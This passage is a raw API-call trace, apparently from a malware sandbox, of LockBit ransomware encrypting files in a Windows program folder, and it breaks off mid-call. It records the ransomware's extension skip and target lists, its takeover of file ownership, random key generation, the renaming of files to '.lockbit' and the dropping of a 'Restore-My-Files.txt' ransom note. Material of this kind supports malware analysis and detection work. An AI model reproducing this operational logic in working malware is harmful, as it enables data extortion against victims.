lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0087.276] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv.lockbit") returned 86 [0087.276] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.276] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.277] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.277] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.277] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.277] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.277] RtlFreeAnsiString (AnsiString="\\") [0087.277] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0087.277] malloc (_Size=0x200) returned 0x77d800 [0087.277] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.278] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.278] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.278] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.278] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.278] CloseHandle (hObject=0x3ac) returned 1 [0087.278] free (_Block=0x77d800) [0087.278] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0087.279] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.279] malloc (_Size=0x40068) returned 0x3df0008 [0087.279] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=542466) returned 1 [0087.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0087.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0087.280] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0087.285] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.285] malloc (_Size=0xc2) returned 0x1ff1e60 [0087.285] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0087.286] free (_Block=0x1ff1e60) [0087.286] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0087.286] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0087.286] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.286] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709b333f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x709b333f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f0d440f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84702, dwReserved0=0x0, dwReserved1=0x0, cFileName="Panel_Mask_PAL.wmv", cAlternateFileName="")) returned 0 [0087.286] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0087.287] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f90420, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0x74f90420, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0x74f90420, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0087.287] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0087.287] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0087.287] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0087.287] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0087.287] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0087.288] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0087.288] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0087.289] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0087.289] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e91e8b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e91e8b0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="scene_button_style_default_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0087.289] lstrcmpiW (lpString1=".", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.289] lstrcmpiW (lpString1="..", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.289] PathFindExtensionW (pszPath="scene_button_style_default_Thumbnail.bmp") returned=".bmp" [0087.289] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0087.289] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0087.289] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0087.290] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0087.290] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0087.290] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0087.291] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0087.291] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0087.291] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.292] lstrcmpiW (lpString1="ntldr", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.292] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.292] lstrcmpiW (lpString1="bootsect.bak", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.292] lstrcmpiW (lpString1="autorun.inf", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.292] lstrcmpiW (lpString1="thumbs.db", lpString2="scene_button_style_default_Thumbnail.bmp") returned 1 [0087.292] lstrcmpiW (lpString1="iconcache.db", lpString2="scene_button_style_default_Thumbnail.bmp") returned -1 [0087.292] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0087.292] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp") returned=".bmp" [0087.292] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0087.292] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0087.292] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0087.293] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0087.294] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0087.294] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp.lockbit") returned 93 [0087.294] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.294] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.295] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.295] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.295] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.295] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.295] RtlFreeAnsiString (AnsiString="\\") [0087.295] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0087.295] malloc (_Size=0x200) returned 0x77d800 [0087.295] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0087.296] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.296] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.296] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.296] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.296] CloseHandle (hObject=0x3bc) returned 1 [0087.297] free (_Block=0x77d800) [0087.297] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0087.297] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.297] malloc (_Size=0x40068) returned 0x1ff1e60 [0087.298] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5072) returned 1 [0087.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0087.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0087.299] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.307] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.307] malloc (_Size=0xd0) returned 0x77d800 [0087.307] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xd0, FileInformationClass=0xa) returned 0x0 [0087.308] free (_Block=0x77d800) [0087.308] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0087.308] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0087.308] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.308] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8d25f6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8d25f6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd86, dwReserved0=0x520150, dwReserved1=0x0, cFileName="shadowonlyframe_buttongraphic.png", cAlternateFileName="")) returned 1 [0087.308] lstrcmpiW (lpString1=".", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.308] lstrcmpiW (lpString1="..", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.308] PathFindExtensionW (pszPath="shadowonlyframe_buttongraphic.png") returned=".png" [0087.308] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.308] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.308] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.308] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.309] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.309] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.309] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.309] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.309] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.310] 